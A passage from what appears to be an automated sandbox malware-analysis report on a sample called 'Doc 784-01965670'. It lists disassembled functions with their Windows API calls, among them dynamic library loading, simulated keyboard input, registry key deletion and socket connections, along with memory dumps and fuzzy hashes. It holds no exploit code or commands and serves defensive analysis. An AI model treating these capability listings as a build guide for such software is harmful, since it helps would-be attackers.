                                                                                                                                    • Opcode Fuzzy Hash: b307b7495d9e484b77ad3edce91dc90ef7c994e26f1a80758083a935cdf7c966
                                                                                                                                    • Instruction Fuzzy Hash: 2111C2B02043405BC311EF19984175FBBE9AFD5308F14882EF68497292D7FD854DCB9A
                                                                                                                                    Function 00463D7E Relevance: 7.6, APIs: 5, Instructions: 141libraryloaderCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • LoadLibraryW.KERNEL32(00000000), ref: 00463DD1
                                                                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 00463E68
                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 00463E84
                                                                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 00463ECE
                                                                                                                                    • FreeLibrary.KERNEL32(?,?,?,00000000,?), ref: 00463EF0
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressProc$Library$FreeLoad
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2449869053-0
                                                                                                                                    • Opcode ID: fa0419033c450d646a7a4ef883371915f5dff59722895d189eba4af2447b2958
                                                                                                                                    • Instruction ID: 5a5949aabc30296464acd143044f95cbdcafad8a77d2d24e7d672d776762960f
                                                                                                                                    • Opcode Fuzzy Hash: fa0419033c450d646a7a4ef883371915f5dff59722895d189eba4af2447b2958
                                                                                                                                    • Instruction Fuzzy Hash: 9051C1752043409FC300EF25C881A5BB7A4FF89305F00456EF945A73A2DB79EE45CBAA
                                                                                                                                    Function 0044C379 Relevance: 7.6, APIs: 5, Instructions: 137windowkeyboardCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetKeyboardState.USER32(?,?,00000001,00000001,?,00000000), ref: 0044C3DA
                                                                                                                                    • SetKeyboardState.USER32(00000080), ref: 0044C3ED
                                                                                                                                    • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C441
                                                                                                                                    • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C465
                                                                                                                                    • SendInput.USER32 ref: 0044C509
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: KeyboardMessagePostState$InputSend
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3031425849-0
                                                                                                                                    • Opcode ID: b49b686b41cf8e4dc8898cf8a112ca1a8544ab09a95107e5a7613c5accf95fc9
                                                                                                                                    • Instruction ID: f46f63d78903415e516a46676784f6fcea1caa301ceb581e17347d916cd8316d
                                                                                                                                    • Opcode Fuzzy Hash: b49b686b41cf8e4dc8898cf8a112ca1a8544ab09a95107e5a7613c5accf95fc9
                                                                                                                                    • Instruction Fuzzy Hash: DB413B715462446FF760AB24D944BBFBB94AF99324F04061FF9D4122C2D37D9908C77A
                                                                                                                                    Function 004422B9 Relevance: 7.6, APIs: 5, Instructions: 108registryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • RegEnumKeyExW.ADVAPI32 ref: 004422F0
                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,00000000,00000000,?,?), ref: 0044232B
                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0044234E
                                                                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00442390
                                                                                                                                    • RegEnumKeyExW.ADVAPI32(?,00000000), ref: 004423C0
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Enum$CloseDeleteOpen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2095303065-0
                                                                                                                                    • Opcode ID: 367b6e42355be36f427f5e4c5f923650598af64a8eac08207e4f2af605b886a1
                                                                                                                                    • Instruction ID: 24d8057b763805d248a02a33893b377b1579bd56aab3fff97e90bb3d062a49ad
                                                                                                                                    • Opcode Fuzzy Hash: 367b6e42355be36f427f5e4c5f923650598af64a8eac08207e4f2af605b886a1
                                                                                                                                    • Instruction Fuzzy Hash: 0C3150721043056EE210DF94DD84FBF73ECEBC9314F44492EBA9596141D7B8E9098B6A
                                                                                                                                    Function 0045C277 Relevance: 7.6, APIs: 5, Instructions: 105COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C2F4
                                                                                                                                    • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C31B
                                                                                                                                    • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C363
                                                                                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C385
                                                                                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C392
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: PrivateProfile$SectionWrite$String
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2832842796-0
                                                                                                                                    • Opcode ID: c76cc1094b5fb1fc43fcb7877a7661b5ae667b5fa7796de5023eb6f45200691f
                                                                                                                                    • Instruction ID: eb365ed5c03c4bb3a44f9ddbc5128f2f56e5f8affd5b6ace934fe40af23b551f
                                                                                                                                    • Opcode Fuzzy Hash: c76cc1094b5fb1fc43fcb7877a7661b5ae667b5fa7796de5023eb6f45200691f
                                                                                                                                    • Instruction Fuzzy Hash: 00318675240305ABD610DFA1DC85F9BB3A8AF84705F00891DF94497292D7B9E889CB94
                                                                                                                                    Function 0044796B Relevance: 7.6, APIs: 5, Instructions: 96COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00447997
                                                                                                                                    • GetCursorPos.USER32(?), ref: 004479A2
                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 004479BE
                                                                                                                                    • WindowFromPoint.USER32(?,?), ref: 004479FF
                                                                                                                                    • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447A78
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Client$CursorFromPointProcRectScreenWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1822080540-0
                                                                                                                                    • Opcode ID: c356f0f93048ebf3c0a873f2be17aa192b5fb9472fb724aa4a6a449873fe30ba
                                                                                                                                    • Instruction ID: e9c1e18ea4fcc9a2ad4b32cd349e8b57ec7287094a91df3c43d19f1875151664
                                                                                                                                    • Opcode Fuzzy Hash: c356f0f93048ebf3c0a873f2be17aa192b5fb9472fb724aa4a6a449873fe30ba
                                                                                                                                    • Instruction Fuzzy Hash: DE3188742082029BD710CF19D88596FB7A9EBC8714F144A1EF88097291D778EA57CBAA
                                                                                                                                    Function 00447BAF Relevance: 7.6, APIs: 5, Instructions: 95COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00447C1B
                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00447C39
                                                                                                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C4C
                                                                                                                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447C93
                                                                                                                                    • EndPaint.USER32(?,?), ref: 00447CD1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ClientPaintRectRectangleScreenViewportWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 659298297-0
                                                                                                                                    • Opcode ID: a6d698a2242c6caf7091173c4181dadfabb51550506680b35635a03376f271bc
                                                                                                                                    • Instruction ID: 653bb342b0117225c29b14224c0e663a7b864e912777eddc33bb147bcfad3e12
                                                                                                                                    • Opcode Fuzzy Hash: a6d698a2242c6caf7091173c4181dadfabb51550506680b35635a03376f271bc
                                                                                                                                    • Instruction Fuzzy Hash: 8A3150706043019FE320CF15D9C8F7B7BE8EB89724F044A6EF994873A1D774A8468B69
                                                                                                                                    Function 00447870 Relevance: 7.6, APIs: 5, Instructions: 94windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetCursorPos.USER32(?), ref: 004478A7
                                                                                                                                    • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478C3
                                                                                                                                    • DefDlgProcW.USER32(?,0000007B,?,?,004A83D8,?,004A83D8,?), ref: 004478E7
                                                                                                                                    • GetCursorPos.USER32(?), ref: 00447935
                                                                                                                                    • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 0044795B
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CursorMenuPopupTrack$Proc
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1300944170-0
                                                                                                                                    • Opcode ID: 00aabaf84d80e4f8c92fc7d2a6c816b999107077810d41e1d32a7af9c3da8c6b
                                                                                                                                    • Instruction ID: 600148c7f6f0e64f7aba5c2d0a58757112576a5c49d56a392ea253be37485a5b
                                                                                                                                    • Opcode Fuzzy Hash: 00aabaf84d80e4f8c92fc7d2a6c816b999107077810d41e1d32a7af9c3da8c6b
                                                                                                                                    • Instruction Fuzzy Hash: 2B31E475244204ABE214DB48DC48FABB7A5FBC9711F14491EF64483390D7B96C4BC779
                                                                                                                                    Function 00448837 Relevance: 7.6, APIs: 5, Instructions: 89COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                                                                                    • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                                                                                    • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                                                                                                                    • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                                                                                                                    • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                                                                                      • Part of subcall function 004413F0: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0044140E
                                                                                                                                      • Part of subcall function 004413F0: GetWindowLongW.USER32(?,000000F0), ref: 00441452
                                                                                                                                      • Part of subcall function 004413F0: GetWindowLongW.USER32(?,000000F0), ref: 00441493
                                                                                                                                      • Part of subcall function 004413F0: SendMessageW.USER32(02FA1BE8,000000F1,00000000,00000000), ref: 004414C6
                                                                                                                                      • Part of subcall function 004413F0: SendMessageW.USER32(02FA1BE8,000000F1,00000001,00000000), ref: 004414F1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$EnableMessageSend$LongShow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 142311417-0
                                                                                                                                    • Opcode ID: 63a7105258867651d9446b65671e60b54e1f680e017c4d0f27b0fbeeb6060130
                                                                                                                                    • Instruction ID: 53ead31d82dc60d0a1ec6489c26700cf05fac79e8a5bf65a12bf69c5108a1aee
                                                                                                                                    • Opcode Fuzzy Hash: 63a7105258867651d9446b65671e60b54e1f680e017c4d0f27b0fbeeb6060130
                                                                                                                                    • Instruction Fuzzy Hash: 942105B07053809BF7148E28C8C47AFB7D0FB95345F08482EF981A6391DBAC9845C72E
                                                                                                                                    Function 00449549 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • _memset.LIBCMT ref: 0044955A
                                                                                                                                      • Part of subcall function 00433A98: _wcspbrk.LIBCMT ref: 00433AAC
                                                                                                                                    • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 004495B3
                                                                                                                                    • _wcslen.LIBCMT ref: 004495C1
                                                                                                                                    • _wcslen.LIBCMT ref: 004495CE
                                                                                                                                    • SendMessageW.USER32(?,00001060,00000000,?), ref: 004495FF
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend_wcslen$_memset_wcspbrk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1843234404-0
                                                                                                                                    • Opcode ID: b21334e59b332bdcefcacb45badc01962a29afe58654cc2f886ab9dc01dd4065
                                                                                                                                    • Instruction ID: 2eba0e6ca7bf2f01d6f4dc0284c8cedbdf4c7ea0b5caad0642d64795040b3bc6
                                                                                                                                    • Opcode Fuzzy Hash: b21334e59b332bdcefcacb45badc01962a29afe58654cc2f886ab9dc01dd4065
                                                                                                                                    • Instruction Fuzzy Hash: 1821F87260430556E630EB15AC81BFBB3D8EBD0761F10483FEE4081280E67E9959D3AA
                                                                                                                                    Function 00455014 Relevance: 7.6, APIs: 5, Instructions: 78COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 43986f9d4d7e017d9aea9f4dce7e52c9963f71054abe4abd36fa420e2ae722de
                                                                                                                                    • Instruction ID: 4734ce3ce40af5b77ad59fd8baedf6a3e56741e39cc50bb30d89ac3ca2d3bd52
                                                                                                                                    • Opcode Fuzzy Hash: 43986f9d4d7e017d9aea9f4dce7e52c9963f71054abe4abd36fa420e2ae722de
                                                                                                                                    • Instruction Fuzzy Hash: 1321E0712006409BCB10EF29D994D6B73A8EF45321B40466EFE5597382DB34EC08CBA9
                                                                                                                                    Function 00445719 Relevance: 7.6, APIs: 5, Instructions: 76windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • IsWindowVisible.USER32(?), ref: 00445721
                                                                                                                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0044573C
                                                                                                                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00445773
                                                                                                                                    • _wcslen.LIBCMT ref: 004457A3
                                                                                                                                    • CharUpperBuffW.USER32(00000000,00000000), ref: 004457AD
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3087257052-0
                                                                                                                                    • Opcode ID: 07a683c3f77dae50ee773e7e3fa5154241049f7b31449e9a489b3be5124be6a3
                                                                                                                                    • Instruction ID: 00e09c3d40749c53521e9302b0eb92bb7bfe2d7d521d01ead8474e6f611d5aec
                                                                                                                                    • Opcode Fuzzy Hash: 07a683c3f77dae50ee773e7e3fa5154241049f7b31449e9a489b3be5124be6a3
                                                                                                                                    • Instruction Fuzzy Hash: FA11E972601741BBF7105B35DC46F5B77CDAF65320F04443AF40AE6281FB69E84583AA
                                                                                                                                    Function 00459DCF Relevance: 7.6, APIs: 5, Instructions: 71COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • IsWindow.USER32(00000000), ref: 00459DEF
                                                                                                                                    • GetForegroundWindow.USER32 ref: 00459E07
                                                                                                                                    • GetDC.USER32(00000000), ref: 00459E44
                                                                                                                                    • GetPixel.GDI32(00000000,?,00000000), ref: 00459E4F
                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00459E8B
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$ForegroundPixelRelease
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4156661090-0
                                                                                                                                    • Opcode ID: c25ec76bf159445cc401153d518622b926736981535c7bd42fe0b2b106eefd61
                                                                                                                                    • Instruction ID: f25aa70a507d7fb142791e963b89e5313ab4350e7ab13503248c443e15a863bf
                                                                                                                                    • Opcode Fuzzy Hash: c25ec76bf159445cc401153d518622b926736981535c7bd42fe0b2b106eefd61
                                                                                                                                    • Instruction Fuzzy Hash: 76219D76600202ABD700EFA5CD49A5AB7E9FF84315F19483DF90597642DB78FC04CBA9
                                                                                                                                    Function 00464950 Relevance: 7.6, APIs: 5, Instructions: 68networkCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 004647A2: inet_addr.WSOCK32(?), ref: 004647C7
                                                                                                                                    • socket.WSOCK32(00000002,00000001,00000006), ref: 00464985
                                                                                                                                    • WSAGetLastError.WSOCK32(00000000,00000002,00000001,00000006,00000000), ref: 00464993
                                                                                                                                    • connect.WSOCK32(00000000,00000000,00000010), ref: 004649CD
                                                                                                                                    • WSAGetLastError.WSOCK32(00000000,00000000,00000000,00000010,00000002,00000001,00000006,00000000), ref: 004649F4
                                                                                                                                    • closesocket.WSOCK32(00000000), ref: 00464A07
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 245547762-0
                                                                                                                                    • Opcode ID: aaa03f654d2c2080970664bbc2635e6406c59b0d093f7dcd590a1c65d79e0220
                                                                                                                                    • Instruction ID: b27d5ee258410aac5bd3077dd9c53ce90635b59006b610d0ec7ee295a05cd03d
                                                                                                                                    • Opcode Fuzzy Hash: aaa03f654d2c2080970664bbc2635e6406c59b0d093f7dcd590a1c65d79e0220
                                                                                                                                    • Instruction Fuzzy Hash: 3211DA712002109BD310FB2AC842F9BB3D8AF85728F04895FF594A72D2D7B9A885875A
                                                                                                                                    Function 0044710F Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00447151
                                                                                                                                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                                                                    • BeginPath.GDI32(?), ref: 004471B7
                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
